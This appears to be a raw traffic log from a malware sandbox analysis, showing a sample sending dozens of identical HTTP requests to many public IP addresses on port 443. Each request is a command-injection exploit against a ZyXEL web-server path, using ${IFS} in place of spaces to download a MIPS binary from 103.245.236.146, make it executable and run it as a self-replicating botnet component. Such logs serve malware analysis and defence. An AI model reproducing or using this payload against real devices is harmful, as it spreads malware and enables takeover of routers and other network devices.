                                                Jan 28, 2024 10:16:21.760349989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3555192.168.2.2353660122.230.2.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760375023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3556192.168.2.2344018212.126.106.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760401011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3557192.168.2.234408467.26.236.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760423899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3558192.168.2.2338144139.109.40.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760457993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3559192.168.2.2341052140.82.143.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760482073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3560192.168.2.2353850193.3.203.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760488987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3561192.168.2.234110424.224.188.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760498047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3562192.168.2.2347948210.71.217.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760514021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3563192.168.2.2334182189.133.149.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760560036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3564192.168.2.2334824110.99.117.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760618925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3565192.168.2.234185868.72.233.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760643005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3566192.168.2.234528436.235.221.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760658026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3567192.168.2.2341440144.221.25.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760675907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3568192.168.2.234110668.215.156.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760690928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3569192.168.2.2346792165.35.55.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760719061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3570192.168.2.2340806124.220.115.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760757923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3571192.168.2.233345636.249.106.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760792017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3572192.168.2.2358558116.143.181.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760838985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3573192.168.2.233912296.228.178.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760853052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3574192.168.2.233987889.17.241.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760880947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3575192.168.2.234287444.27.244.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760911942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3576192.168.2.23391905.253.85.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760921001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3577192.168.2.2350640119.223.88.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760951996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3578192.168.2.2345418116.191.222.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760967016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3579192.168.2.234511447.129.220.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761003017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3580192.168.2.23580061.42.118.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761033058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3581192.168.2.235261078.42.172.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761058092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3582192.168.2.2334326100.253.203.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761096001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3583192.168.2.2352108156.130.54.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761121035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3584192.168.2.2353728205.243.43.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761158943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3585192.168.2.2341168143.52.248.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761163950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3586192.168.2.2356486146.73.196.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761192083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3587192.168.2.2353604143.125.137.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761192083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3588192.168.2.2332934141.173.17.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761218071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3589192.168.2.2333770132.248.161.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761218071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3590192.168.2.2342674188.8.207.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761243105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3591192.168.2.235525038.90.180.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761286974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3592192.168.2.23598809.0.38.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761286974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3593192.168.2.235264868.50.202.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761317968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3594192.168.2.235142236.101.38.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761351109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3595192.168.2.2334404102.219.36.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761368036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3596192.168.2.2357148120.5.131.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761394024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3597192.168.2.2335096130.201.141.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761430025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3598192.168.2.2338330175.122.145.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761472940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3599192.168.2.235613827.133.255.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761480093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3600192.168.2.2336348100.152.19.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761503935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3601192.168.2.2346038164.87.37.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761518955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3602192.168.2.2351618122.206.2.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761534929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3603192.168.2.2336820111.67.123.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.761579990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3604192.168.2.2343606104.162.139.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763190985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3605192.168.2.2341790130.205.118.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763268948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3606192.168.2.2351748194.154.119.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763299942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3607192.168.2.2355236166.229.187.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763304949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3608192.168.2.2347786175.96.148.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763330936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3609192.168.2.2346412182.97.57.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763381958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3610192.168.2.234839293.96.210.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763416052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3611192.168.2.2340674190.204.120.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763417006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3612192.168.2.234441237.132.119.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763441086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3613192.168.2.235389074.10.151.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763447046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3614192.168.2.2351172102.147.68.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763494968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3615192.168.2.234049434.129.250.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763540030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3616192.168.2.233753082.253.168.14443
                                                TimestampBytes transferredDirectionData
